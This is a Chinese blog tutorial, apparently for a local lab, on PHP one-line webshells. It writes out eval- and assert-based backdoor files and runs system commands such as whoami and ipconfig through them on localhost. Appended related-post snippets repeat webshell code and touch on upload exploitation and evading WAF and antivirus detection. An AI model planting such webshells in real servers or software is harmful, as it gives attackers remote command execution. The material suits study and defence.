一句话木马

最新推荐文章于 2023-03-03 10:32:46 发布
最新推荐文章于 2023-03-03 10:32:46 发布
阅读量303 收藏 1
点赞数
文章标签: php apache mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46831054/article/details/121706239
版权

一句话木马
一:具备网站环境
打开phpstudy,启动Apache和MySQL.
检查网站中网站域名为localhost的网站的状态,若过期,则到管理中点击修改,修改日期。确保该网站的正常运行。

添加附件HackBar:在火狐中打开应用程序菜单,点击扩展和主题,然后点击插件,进入新页面后找到右上角的小齿轮,点击从文件安装附加组件。找到hackbar文件所在路径,添加即可。注意关闭自动更新。

二:创建get.php文件并执行
文件内容为:
php
header(“Content-type:text/html;charset=gbk”);//中文声明代码
@eval($_POST[‘cmd’]);?>
函数eval — 把字符串作为PHP代码执行
注:函数eval()语言结构是 非常危险的,因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外别无方法, 请多加注意,不要允许传入任何由用户提供的、未经完整验证过的数据 。

在浏览器中应用:
输入:127.0.0.1/get.php?cmd=system(‘ipconfig’);
可以得到界面
请添加图片描述

二:创建post.php文件并执行
文件内容为:

<?php @eval($_POST['cmd']);?>

在浏览器中应用:
输入:127.0.0.1/post.php?cmd=system(‘whoami’);
可以得到空白界面,即为成功执行。
打开网页控制台,按F2。点击HackBar,进行下图操作。请添加图片描述

二:创建assert.php文件并执行
文件内容:

<?php header("Content-type:text/html;charset=gbk"); @assert($_POST['cmd']);?>

在浏览器中应用:
输入:127.0.0.1/assert.php?cmd=system(‘whoami’);
可以得到空白界面,即为成功执行。
打开网页控制台,按F2。点击HackBar,进行下图操作

请添加图片描述
请添加图片描述

深渊渔火
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话木马以及免杀
抚琴
01-08 3868
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
【用一句话木马文件上传漏洞挖掘实战】
m0_68563451的博客
03-03 1164
6.使用AntSword(中国蚁剑)管理工具连接一句话,注意连接密码就是一句话里的值。5.成功将一句话木马作为头像上传,右键点击查看图像,可以拿到图片路径。3.点击上传头像,将一句话木马改为图片形式上传,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用一句话木马文件上传漏洞挖掘实战。1.点击新用户注册,注册一个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
探索基于.NET下实现一句话木马之asmx篇1
08-03
【.NET下实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
Apache http 一句话
iteye_3911的博客
07-26 137
Apache httpd is very fastest web server for static contents. Apache httpd web server has biggest market share of more than 60% in web server in world. [size=xx-large][color=red]Today apache httpd web ...
一句话木马的原理
枫梓林のBlog
04-22 6377
一句话木马的原理 文章目录一句话木马的原理0x00 前言0x01 解析 PHP 一句话木马的原理0x02 解析蚁剑连接一句话木马原理1.蚁剑2.使用蚁剑进行连接0x03 分析蚁剑连接原理0x04 加密的 ASP 一句话后门0x04 JSP一句话木马0x05 ASPX一句话 0x00 前言 常用的一句话后门工具分为 ASP、ASP.NET、JSP和 PHP 四种类型 0x01 解析 PHP 一句话木马的原理 常用一句话木马 php一句话木马: <?php @eval($_POST['pass']);?
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
一句话木马简介
qq_41272376的博客
02-15 6986
一句话木马简介 一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php
复现一句话木马
lml_0916的博客
07-23 381
发现了2的值是直接输入的的一些PHP获取文件的函数的字符串,但是assert()函数的参数不可以使用字符串。首先右键添加一个新的数据,将刚刚编写的文件名输入到URL地址中,然后连接密码设置的是2。这样的话同时满足了assert()的参数必须是函数和表达式中的一种,和eval语句中有可以传递的参数,所以连接成功。解决的方式就是修改了一下我的php版本,一开始我用实验的版本是7.3.4的,后面改成了5.3.29的版本扣可以了、但是刚刚直接使用eval进行连接的时候是可以连接的,为什么这样替换就不可以了?....
浅析一句话木马
coordinate的博客
10-01 4986
一开始对于一句话木马感觉很神奇,因为它特别的短,用过的人都知道。分析原理后,又非常想知道到底是什么人想出这么一个好的想法,真的非常的天才。以php一句话为例子<?php eval($_POST[c]); ?>我么将这句话保存为x.php文件上传到网站中,通过菜刀可以轻松连接。 究其原理其实很简单,看下面这个做法,通过对x.php中的c进行post 菜刀的功能无非是把我们要post的数据传
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值